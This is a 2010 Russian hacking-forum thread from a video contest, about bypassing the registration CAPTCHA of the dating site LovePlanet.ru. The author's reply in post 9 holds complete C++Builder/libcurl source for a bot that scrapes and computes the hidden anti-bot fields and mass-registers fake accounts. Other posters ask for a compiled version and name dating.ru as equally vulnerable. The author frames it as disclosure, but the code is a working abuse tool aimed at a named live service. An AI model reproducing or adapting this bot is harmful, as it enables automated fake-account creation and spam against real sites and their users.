Обход капчи loveplanet.ru

Discussion in 'Видео-Конкурс [лето 2010]' started by M_script, 24 Jul 2010.

  1. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,668
    Likes Received:
    1,265
    Reputations:
    1,557
    CAPTCHA - в настоящее время наиболее распространенный в интернете вид защиты различных сервисов от автоматических регистраций, массовых рассылок и т.д.
    В моем видео показана одна из уязвимостей CAPTCHA, позволяющая обойти эту защиту на сайте LovePlanet.ru
    LovePlanet.Ru - один из известнейших сайтов знакомств в рунете, начал свою работу в 2005 году. Но как видите, даже на таких крупных сайтах встречаются достаточно серьезные ошибки.

    Посмотреть видео на YouTube.com
    Скачать архив (RAR, 28.5Mb, пароль 123454321)

    В видео показан обход капчи при авторизации, но этим способом можно обойти капчу на любой странице LP
    Возможно, в конкурсе уязвимостей это видео будет оффтопом, но мне понравилось :)
     
    #1 M_script, 24 Jul 2010
    Last edited: 24 Jul 2010
    24 people like this.
  2. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    1,052
    Likes Received:
    780
    Reputations:
    313
    мне понравилось)
    и музычка в тему.


    не плохой старт конкурса=)
     
    1 person likes this.
  3. Professor7717

    Professor7717 Member

    Joined:
    10 Feb 2010
    Messages:
    238
    Likes Received:
    22
    Reputations:
    6
    Хорошое видео!
     
  4. Qws

    Qws Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    55
    Likes Received:
    62
    Reputations:
    5
    мне нравиться;)
     
  5. rudi

    rudi Active Member

    Joined:
    3 Jun 2010
    Messages:
    516
    Likes Received:
    161
    Reputations:
    5
    молодец !!!
    Но теперь боюсь скоро эту дырку прикроют теперь
     
  6. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,668
    Likes Received:
    1,265
    Reputations:
    1,557
    Видео для того и нужно, чтобы ошибки исправляли, а не чтобы их использовали в своих целях.
    Это лишь пример, подобные ошибки есть на многих сервисах.

    CamStudio + Video Edit Magic
     
    #6 M_script, 24 Jul 2010
    Last edited: 24 Jul 2010
    3 people like this.
  7. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    378
    Likes Received:
    346
    Reputations:
    292
    через CamStudio снимал?
     
    _________________________
  8. nupaT

    nupaT Active Member

    Joined:
    25 Oct 2008
    Messages:
    103
    Likes Received:
    109
    Reputations:
    20
    Выкладывай программу в тему, чтобы мы вместе искоренили этот баг !
     
  9. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,668
    Likes Received:
    1,265
    Reputations:
    1,557
    nupaT, код программы из видео:
    PHP:
    //---------------------------------------------------------------------------

    #include <vcl.h>
    #include <curl/curl.h>
    #pragma hdrstop

    #include "Unit1.h"
    //---------------------------------------------------------------------------
    #pragma package(smart_init)
    #pragma resource "*.dfm"
    TForm1 *Form1;

    //---------------------------------------------------------------------------
    static size_t Writer(char *datasize_t sizesize_t nmembString *buffer)
    {
        
    size_t result 0;
        if(
    buffer != NULL)
        {
            
    buffer->Insert(databuffer->Length() + 1);
            
    result size nmemb;
        }
        return 
    result;
    }
    //---------------------------------------------------------------------------
    __fastcall TForm1::TForm1(TComponentOwner)
        : 
    TForm(Owner)
    {
    }
    //---------------------------------------------------------------------------
    void __fastcall TForm1::Button1Click(TObject *Sender)
    {
        
    Randomize();
        
        
    String     sName
                
    sPage
                
    sRequest
                
    sA,
                
    sB,
                
    sC;
        
        
    String     sSomenums "16657477591644548381",
                
    sPic "7617";

        
    HINSTANCE libcurl LoadLibrary"libcurl.dll" );

        
    CURL*(__stdcall *curl_easy_init)();
        
    CURLcode(__stdcall *curl_easy_setopt )(CURL *curlCURLoption option, ...);
        
    CURLcode (__stdcall *curl_easy_perform )(CURL *curl);

        
    curl_easy_init =(CURL*(__stdcall*)())GetProcAddress(libcurl"curl_easy_init" );
        
    curl_easy_setopt =(CURLcode(__stdcall *)(CURL *curlCURLoption option, ...))
                            
    GetProcAddress(libcurl"curl_easy_setopt");
        
    curl_easy_perform =(CURLcode(__stdcall *)(CURL *curl))GetProcAddress(libcurl"curl_easy_perform" );
                
        
    CURL *curl curl_easy_init();
        
    curl_easy_setopt(curlCURLOPT_WRITEFUNCTIONWriter);
        
    curl_easy_setopt(curlCURLOPT_WRITEDATA, &sPage);
        
    curl_easy_setopt(curlCURLOPT_USERAGENT"Opera/9.80 (Windows NT 5.1; U; ru)");
        
    curl_easy_setopt(curlCURLOPT_COOKIELIST"");

        
    curl_easy_setopt(curlCURLOPT_URL"http://loveplanet.ru/a-register/");
        
    curl_easy_setopt(curlCURLOPT_REFERER"http://loveplanet.ru/a-register/");

        
        for(
    int n 03; ++n)
        {            
            
    curl_easy_setopt(curlCURLOPT_COOKIELIST"ALL");
            
            
    // получение страницы регистрации
            
    sPage "";
            
    curl_easy_setopt(curlCURLOPT_POST0);
            
    curl_easy_perform(curl);
                
            
    // вычисление параметров a_, b_, c_
            
    sA sPage;
            
    sA.Delete(1sA.Pos("'a_').value = ") + 14 1);
            
    sA.SetLength(sA.Pos(" ") - 1);
            
            
    sB sPage;
            
    sB.Delete(1sB.Pos("'b_').value = ") + 14 1);
            
    sB.SetLength(sB.Pos(" ") - 1);
            
            
    sC sPage;
            
    sC.Delete(1sC.Pos("'c_').value = ") + 14 1);
            
    sC.SetLength(sC.Pos(" ") - 1);
            
            
    sA IntToStrsA.ToInt() + sC.ToInt() );
            
    sB IntToStrsB.ToInt() + * (sC.ToInt() + 3) );
            
    sC IntToStrsC.ToInt() - );

            
    // генерируем имя из символов [a..z]
            
    sName "";
            for(
    int i 06; ++i)
                
    sName += (char)(Random('z' 'a') + 'a'); 
            
            
    sRequest =     "a=register&d=1&a_=" 
                        
    sA +
                        
    "&b_=" +
                        
    sB +
                        
    "&c_=" +
                        
    sC +
                        
    "&somenums=" +
                        
    sSomenums +
                        
    "&login=" 
                        
    sName +
                        
    "&password=" 
                        
    sName 
                        
    "qwe&password2=" 
                        
    sName 
                        
    "qwe&email=" +
                        
    sName 
                        
    "%40gmail.com&name=" 
                        
    sName +
                        
    "&bday=01&bmonth=01&byear=1990&bnotify=on&pol=1&orient=1&country=3159&region=4312&city=4400&pic=" +
                        
    sPic +
                        
    "&conditions=1";
            
    sPage "";
            
    curl_easy_setopt(curlCURLOPT_POSTFIELDSsRequest.c_str());
            
    curl_easy_setopt(curlCURLOPT_POST1);
            
    curl_easy_perform(curl);

            
    Memo1->Lines->Add(sName ":" sName "qwe");
        }
    }
    //---------------------------------------------------------------------------
     
  10. nupaT

    nupaT Active Member

    Joined:
    25 Oct 2008
    Messages:
    103
    Likes Received:
    109
    Reputations:
    20
    M_script

    А скомпилированный? :rolleyes:
     
  11. Yetisports

    Yetisports Banned

    Joined:
    11 Jul 2010
    Messages:
    217
    Likes Received:
    12
    Reputations:
    17
    школота скоро угробит его)
     
  12. .ATK

    .ATK Active Member

    Joined:
    20 Feb 2009
    Messages:
    235
    Likes Received:
    112
    Reputations:
    9
    Видео на 5+, молодец.

    А по теме: спам на лавпланет не реален, я раза два брался) модеры или ИИ, там жесть...
     
  13. ZdezBilYa

    ZdezBilYa Elder - Старейшина

    Joined:
    29 Aug 2008
    Messages:
    237
    Likes Received:
    75
    Reputations:
    19
    На рамблере недавно такая же была . И мыла и аськи можно было регистрировать обходя защиту капчей)
     
  14. Tetraider

    Tetraider Member

    Joined:
    13 Dec 2009
    Messages:
    23
    Likes Received:
    8
    Reputations:
    0
    Молодец) Видео понравилрсь!
     
  15. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    191
    Likes Received:
    45
    Reputations:
    26
    молодец )
    +
     
  16. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    429
    Likes Received:
    144
    Reputations:
    29
    Хорошее видео.
     
  17. Toxa.ru

    Toxa.ru Banned

    Joined:
    26 Jul 2009
    Messages:
    16
    Likes Received:
    31
    Reputations:
    1
    Отличное начало)
    Автор молодец)
     
    1 person likes this.
  18. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    944
    Likes Received:
    428
    Reputations:
    139
    M_script, Да. Действительно. Давай сконпелированный вариант. Не все используют такую ху...ю вещь как VCL.

    //Не в обиду, не люблю борланд.
     
  19. MAQUEEN

    MAQUEEN RadioActivity

    Joined:
    27 Sep 2008
    Messages:
    429
    Likes Received:
    124
    Reputations:
    32
    класссс...... мне очень понравилось !
     
  20. fire64

    fire64 Elder - Старейшина

    Joined:
    1 Apr 2008
    Messages:
    280
    Likes Received:
    22
    Reputations:
    5
    Кстати, на многих сайтах знакомств та же система

    Например http://dating.ru

    http://dating.ru/reg_code.php?rndnum=1062605203